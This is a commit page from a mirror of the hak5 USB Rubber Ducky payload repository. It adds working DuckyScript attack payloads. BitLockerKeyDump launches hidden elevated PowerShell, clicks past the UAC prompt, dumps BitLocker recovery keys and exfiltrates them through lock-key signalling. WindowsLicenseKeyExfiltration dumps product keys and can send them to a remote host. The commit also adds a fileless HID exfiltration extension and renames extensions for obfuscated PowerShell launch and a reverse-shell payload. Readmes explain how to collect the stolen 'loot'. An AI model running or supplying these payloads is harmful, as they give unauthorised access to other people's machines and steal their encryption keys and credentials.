hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #392 from 0iphor13/master 

New Payload: BitLockerKeyDump, WindowsLicenseKeyExfiltration -  New Extension: Windows_Fileless_HID_Exfil
pull/428/head
Dallas Winger 2024-01-02 19:11:36 -05:00 committed by GitHub
parent f2f850b555 3a216241d8
commit c8030600ef
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
12 changed files with 445 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
payloads/extensions/community/Detect_Finished → payloads/extensions/community/DETECT_FINISHED
View File

@ -1,4 +1,4 @@
EXTENSION Detect_Finished
EXTENSION DETECT_FINISHED
REM VERSION 1.0
REM AUTHOR: 0iphor13

2
payloads/extensions/community/Powershell_Download → payloads/extensions/community/POWERSHELL_DOWNLOAD
View File

@ -1,4 +1,4 @@
EXTENSION Powershell_Download
EXTENSION POWERSHELL_DOWNLOAD
REM VERSION 1.0
REM Author: 0iphor13
REM Downloads the desired file via powershell

2
payloads/extensions/community/Rolling_Powershell_Execution → payloads/extensions/community/ROLLING_POWERSHELL_EXECUTION
View File

@ -1,4 +1,4 @@
EXTENSION Rolling_Powershell_Execution
EXTENSION ROLLING_POWERSHELL_EXECUTION
REM VERSION 1.0
REM Author: 0iphor13
REM OS: Windows

2
payloads/extensions/community/Windows11_Console_Downgrade → payloads/extensions/community/WINDOWS11_CONSOLE_DOWNGRADE
View File

@ -1,4 +1,4 @@
EXTENSION Windows11_Console_Downgrade
EXTENSION WINDOWS11_CONSOLE_DOWNGRADE
REM_BLOCK
Version: 1.0
Author: 0iphor13

2
payloads/extensions/community/Windows_Elevated_Execution → payloads/extensions/community/WINDOWS_ELEVATED_EXECUTION
View File

@ -1,4 +1,4 @@
EXTENSION Windows_Elevated_Execution
EXTENSION WINDOWS_ELEVATED_EXECUTION
REM VERSION 1.1
REM Author: 0iphor13
REM Executes the desired program with elevated privileges

44
payloads/extensions/community/WINDOWS_FILELESS_HID_EXFIL Normal file
View File

@ -0,0 +1,44 @@
EXTENSION WINDOWS_FILELESS_HID_EXFIL
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM_BLOCK DOCUMENTATION
Extension for Keystroke Reflection data exfiltration without putting files on disk.
This extension is a proof of concept for USB HID only Data Exfiltration and is based on Hak5s original Method.
TARGET:
Windows Hosts that supports powershell and SendKeys
USAGE:
Type out your command or script with powershell, don't execute it yet (so just type it out with STRING), afterwards you put the function Windows_Fileless_HID_Exfil() behind it.
It'll take the commands/scritps output and writes it into a variable, which then gets exfiltrated.
Example Usage:
GUI r
DELAY 500
STRINGLN powershell
DELAY 1000
STRING echo "This is my test"
Windows_Fileless_HID_Exfil()
END_REM
FUNCTION Windows_Fileless_HID_Exfil()
DELAY 250
REM Saving current Keyboard lock keys
SAVE_HOST_KEYBOARD_LOCK_STATE
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE
DELAY 500
REM Setting the output as variable
STRING |Out-String|Set-Variable -Name "DD";
REM Converting output into Lock Key values
STRING $BL = $DD.ToCharArray();$c = "";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}';
REM Exfiltrating via Keystroke Reflection
STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit
REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.
WAIT_FOR_SCROLL_CHANGE
LED_G
$_EXFIL_MODE_ENABLED = FALSE
RESTORE_HOST_KEYBOARD_LOCK_STATE
END_FUNCTION
END_EXTENSION

168
payloads/library/credentials/BitLockerKeyDump/payload.txt Normal file
View File

@ -0,0 +1,168 @@
REM BitLockerKeyDump
REM Version 1.0
REM OS: Windows
REM Author: 0iphor13
REM Requirement: DuckyScript 3.0
REM This small powershell payload dumps the users BitLocker recovery key and exfiltrates them via Keystroke Reflection
REM Extension made by Korben for checking if Target is Windows OS
EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Extension made by 0iphor13 to signalize the payloads end
EXTENSION DETECT_FINISHED
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM_BLOCK DOCUMENTATION
USAGE:
Use the function Detect_Finished() to signal the finished execution of your payload.
END_REM
REM CONFIGURATION:
DEFINE #PAUSE 150
FUNCTION Detect_Finished()
IF ($_CAPSLOCK_ON == FALSE)
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
ELSE IF
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
END_IF
END_FUNCTION
END_EXTENSION
REM Extension made by 0iphor13 for fileless exfiltration via Lock Keys
EXTENSION WINDOWS_FILELESS_HID_EXFIL
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM_BLOCK DOCUMENTATION
Extension for Keystroke Reflection data exfiltration without putting files on disk.
This extension is a proof of concept for USB HID only Data Exfiltration and is based on Hak5s original Method.
TARGET:
Windows Hosts that supports powershell and SendKeys
USAGE:
Type out your command or script with powershell, don't execute it yet (so just type it out with STRING), afterwards you put the function Windows_Fileless_HID_Exfil() behind it.
It'll take the commands/scritps output and writes it into a variable, which then gets exfiltrated.
Example Usage:
GUI r
DELAY 500
STRINGLN powershell
DELAY 1000
STRING echo "This is my test"
Windows_Fileless_HID_Exfil()
END_REM
FUNCTION Windows_Fileless_HID_Exfil()
DELAY 250
REM Saving current Keyboard lock keys
SAVE_HOST_KEYBOARD_LOCK_STATE
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE
DELAY 500
REM Setting the output as variable
STRING |Out-String|Set-Variable -Name "DD";
REM Converting output into Lock Key values
STRING $BL = $DD.ToCharArray();$c = "";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}';
REM Exfiltrating via Keystroke Reflection
STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit
REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.
WAIT_FOR_SCROLL_CHANGE
LED_G
$_EXFIL_MODE_ENABLED = FALSE
RESTORE_HOST_KEYBOARD_LOCK_STATE
END_FUNCTION
END_EXTENSION
REM Execution of "Yes" shortcut: ALT j (german), ALT y (english)
DEFINE #YES_SHORTCUT ALT j
REM If Target is Windows, execute payload
IF ($_OS == WINDOWS) THEN
GUI r
DELAY 500
REM Opening hidden powershell and pressing CAPSLOCK as Administrator
STRING powershell -nop -c "Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait('{CAPSLOCK}');powershell.exe -nop -w h"
DELAY 250
CTRL-SHIFT ENTER
REM Rather long DELAY to increase reliability
DELAY 2000
REM Shortcut for pressing yes when UAC prompt appears
#YES_SHORTCUT
REM Check for CAPSLOCK change to see if execution as Admin was successful
WAIT_FOR_CAPS_CHANGE
DELAY 1500
REM Dumping recovery keys
STRING Get-BitLockerVolume|ForEach-Object{$drive = $_.MountPoint;$Key = [string]($_.KeyProtector).RecoveryPassword;if ($Key.Length -gt 5){Write-Output ("$drive Drive - Recovery Key: $Key")}}
REM Exfiltrating keys via Keystroke Reflection
Windows_Fileless_HID_Exfil()
DELAY 150
Detect_Finished()
REM If System is not Windows...
ELSE
DELAY 500
REM ... and CAPSLOCK is ON, open Storage...
IF ($_CAPSLOCK_ON == TRUE) THEN
ATTACKMODE STORAGE
REM ... If CAPSLOCK is OFF, stay in ATTACKMODE OFF
ELSE
LED_RED
DELAY 1000
LED_OFF
ATTACKMODE OFF
END_IF
END_IF

33
payloads/library/credentials/BitLockerKeyDump/readme.md Normal file
View File

@ -0,0 +1,33 @@
**Title: BitLockerKeyDump**
<p>Author: 0iphor13<br>
OS: Windows<br>
Version: 1.0<br>
**What is BitLockerKeyDump?**
#
<p>Lets first explain, what is "a BitLocker recovery key"?
A BitLocker recovery key is a unique 48-digit numerical password that is generated when you enable BitLocker on a Windows computer or device.
BitLocker is a disk encryption program included with Windows, and is designed to protect the data on your hard drive by encrypting it.
The recovery key is a critical component of BitLocker because it is used to unlock or recover access to the encrypted drive in case you forget your BitLocker password or experience issues with your computer's hardware or software.
Common scenarios where you might need a BitLocker recovery key:
- Forgotten Password: If you forget the password you set for BitLocker, you can use the recovery key to regain access to your encrypted drive.
- Hardware Changes: If you make significant hardware changes to your computer, such as replacing the motherboard or hard drive, BitLocker may trigger a recovery mode, and you'll need the recovery key to unlock the drive.
- Operating System Errors: In the event of certain operating system errors or issues, BitLocker may require the recovery key to restore access to the encrypted drive.
It's important to keep your BitLocker recovery key in a safe and secure location because it provides a way to bypass BitLocker's encryption and access your data.</p>
Now that we have explained what BitLocker and the recovery key are, what is BitLockerKeyDump? Short and easy: It dumps the recovery key and exfiltrates it via Keystroke Reflection.
**Instructions:**
1. Set the correct "Yes" shortcut in line 132. (i.e. `ALT j` for german systems, `ALT y` for english keyboard layouts)
2. Plug in your RubberDucky into a Windows target and wait for the process to end. Have fun observing the Keyboards LEDs ;)
_*If plugged into a non Windows system, `ATTACKMODE OFF` will be triggered, unless `CAPSLOCK` is ON while the Ducky is getting plugged in. This way you can collect the loot savely._
3. Open the exfiltrated loot.bin file to access the recovery key.

4
payloads/library/credentials/SamDumpDucky/payload.txt
View File

@ -37,7 +37,7 @@ EXTENSION DETECT_READY
END_EXTENSION
REM Extension made by 0iphor13 to automate elevated execution of powershell - Change language layout within here
EXTENSION Windows_Elevated_Execution
EXTENSION WINDOWS_ELEVATED_EXECUTION
REM VERSION 1.1
REM Author: 0iphor13
REM Executes the desired program with elevated privileges
@ -72,7 +72,7 @@ EXTENSION Windows_Elevated_Execution
END_EXTENSION
REM Extension by 0iphor13, to signalize the successful execution of the payload
EXTENSION Detect_Finished
EXTENSION DETECT_FINISHED
REM VERSION 1.0
REM AUTHOR: 0iphor13

167
payloads/library/credentials/WindowsLicenseKeyExfiltration/WindowsLicenseKeyExfiltration.txt Normal file
View File

@ -0,0 +1,167 @@
REM WindowsLicenseKeyExfiltration
REM Version 1.0
REM OS: Windows
REM Author: 0iphor13
REM Requirement: DuckyScript 3.0
REM This small powershell payload dumps the Windows license key, which can be either saved within the Bios and/or in the registry.
REM Extension made by Korben for checking if Target is Windows OS
EXTENSION EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Extension made by 0iphor13 to signalize the payloads end
EXTENSION DETECT_FINISHED
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM_BLOCK DOCUMENTATION
USAGE:
Use the function Detect_Finished() to signal the finished execution of your payload.
END_REM
REM CONFIGURATION:
DEFINE #PAUSE 150
FUNCTION Detect_Finished()
IF ($_CAPSLOCK_ON == FALSE)
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
ELSE IF
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
DELAY #PAUSE
CAPSLOCK
ATTACKMODE OFF
END_IF
END_FUNCTION
END_EXTENSION
REM Extension made by 0iphor13 for fileless exfiltration via Lock Keys
EXTENSION WINDOWS_FILELESS_HID_EXFIL
REM VERSION 1.0
REM AUTHOR: 0iphor13
REM_BLOCK DOCUMENTATION
Extension for Keystroke Reflection data exfiltration without putting files on disk.
This extension is a proof of concept for USB HID only Data Exfiltration and is based on Hak5s original Method.
TARGET:
Windows Hosts that supports powershell and SendKeys
USAGE:
Type out your command or script with powershell, don't execute it yet (so just type it out with STRING), afterwards you put the function Windows_Fileless_HID_Exfil() behind it.
It'll take the commands/scritps output and writes it into a variable, which then gets exfiltrated.
Example Usage:
GUI r
DELAY 500
STRINGLN powershell
DELAY 1000
STRING echo "This is my test"
Windows_Fileless_HID_Exfil()
END_REM
FUNCTION Windows_Fileless_HID_Exfil()
DELAY 250
REM Saving current Keyboard lock keys
SAVE_HOST_KEYBOARD_LOCK_STATE
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE
DELAY 500
REM Setting the output as variable
STRING |Out-String|Set-Variable -Name "DD";
REM Converting output into Lock Key values
STRING $BL = $DD.ToCharArray();$c = "";foreach ($b in $BL){foreach ($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if ($b -band $a){$c += '%{NUMLOCK}'}else{$c += '%{CAPSLOCK}'}}}$c += '%{SCROLLLOCK}';
REM Exfiltrating via Keystroke Reflection
STRINGLN Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($c);exit
REM The final SCROLLLOCK value will be sent to indicate that EXFIL is complete.
WAIT_FOR_SCROLL_CHANGE
LED_G
$_EXFIL_MODE_ENABLED = FALSE
RESTORE_HOST_KEYBOARD_LOCK_STATE
END_FUNCTION
END_EXTENSION
REM If set to TRUE, keys will be send via PowerShells Invoke-Restmethod
DEFINE #REMOTE_EXFIL FALSE
REM Define the remote host to which the keys shall be send to. (Only when REMOTE_EXFIL is set to TRUE!)
DEFINE #URL https://example.com/
REM If Target is Windows, execute payload
IF ($_OS == WINDOWS) THEN
GUI r
DELAY 500
STRINGLN powershell -nop -noni
DELAY 1000
STRINGLN Write-Host "[+]Attempting exfiltration of Windows Product Keys..." -ForegroundColor Green
DELAY 300
REM Dumping License key when saved in Bios
STRING $Get_License = "echo 'Product Key in Bios:';(Get-WmiObject -query 'select * from SoftwareLicensingService').OA3xOriginalProductKey;
REM Dumping License key via registry
STRING Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -name BackupProductKeyDefault | Select-Object BackupProductKeyDefault"
REM Executing Get_License
STRING ;IeX $Get_License
REM If REMOTE_EXFIL is set to TRUE,exfiltrate keys to remote host
IF_DEFINED_TRUE #REMOTE_EXFIL
DELAY 500
REM Setting the output as variable & sending it to defined remote host
STRINGLN |Out-String|Set-Variable -Name "DD";Invoke-Restmethod -UseBasicParsing -Method Post -Uri "#URL" -Body $DD;exit
DELAY 150
Detect_Finished()
ELSE_DEFINED
REM Exfiltrating License key via Keystroke Reflection
Windows_Fileless_HID_Exfil()
DELAY 150
Detect_Finished()
END_IF_DEFINED
REM If System is not Windows...
ELSE
ATTACKMODE STORAGE
END_IF

22
payloads/library/credentials/WindowsLicenseKeyExfiltration/readme.md Normal file
View File

@ -0,0 +1,22 @@
**Title: WindowsLicenseKeyExfiltration**
<p>Author: 0iphor13<br>
OS: Windows<br>
Version: 1.0<br>
**What is WindowsLicenseKeyExfiltration?**
#
<p>This payload exfiltrates the Windows Product keys from the target system. These can be saved in the registry and/or on the BIOS itself. Sometimes they can differ.
This may be an important process for Admins or for your private use.</p>
**Instructions:**
1. By default, the keys will get exfiltrated via Keystroke Reflection, which may take a while but does not require any form of internet connection or mass stoarge to be allowed. If you set `REMOTE_EXFIL` in line 132 to `TRUE`, then you'll need to define the address of the receiving remote host, this either can be an URL of a webhook or an IP_Address of a system of your choice. Define it in line 134.
2. Plug in your RubberDucky into a Windows target and wait for the process to end.
_*If plugged into a non Windows system, `ATTACKMODE STORAGE` will be triggered. This way you can collect the loot savely._
3. Open the exfiltrated loot.bin file to access the recovered key, or check your remote host for received messages.

8
payloads/library/remote_access/ReverseDuckyUltimate/payload.txt
View File

@ -49,8 +49,8 @@ EXTENSION PASSIVE_WINDOWS_DETECT
END_REM
END_EXTENSION
REM Extension Rolling_Powershell_Execution by 0iphor13 to obfuscate the start of Powershell
EXTENSION Rolling_Powershell_Execution
REM Extension ROLLING_POWERSHELL_EXECUTION by 0iphor13 to obfuscate the start of Powershell
EXTENSION ROLLING_POWERSHELL_EXECUTION
REM VERSION 1.0
REM Author: 0iphor13
REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek
@ -129,7 +129,7 @@ EXTENSION Rolling_Powershell_Execution
REM Rolling_Powershell_Execution()
END_EXTENSION
EXTENSION Detect_Finished
EXTENSION DETECT_FINISHED
REM VERSION 1.0
REM AUTHOR: 0iphor13
@ -161,7 +161,7 @@ EXTENSION Detect_Finished
END_FUNCTION
END_EXTENSION
EXTENSION Windows11_Console_Downgrade
EXTENSION WINDOWS11_CONSOLE_DOWNGRADE
REM_BLOCK
Version: 1.0
Author: 0iphor13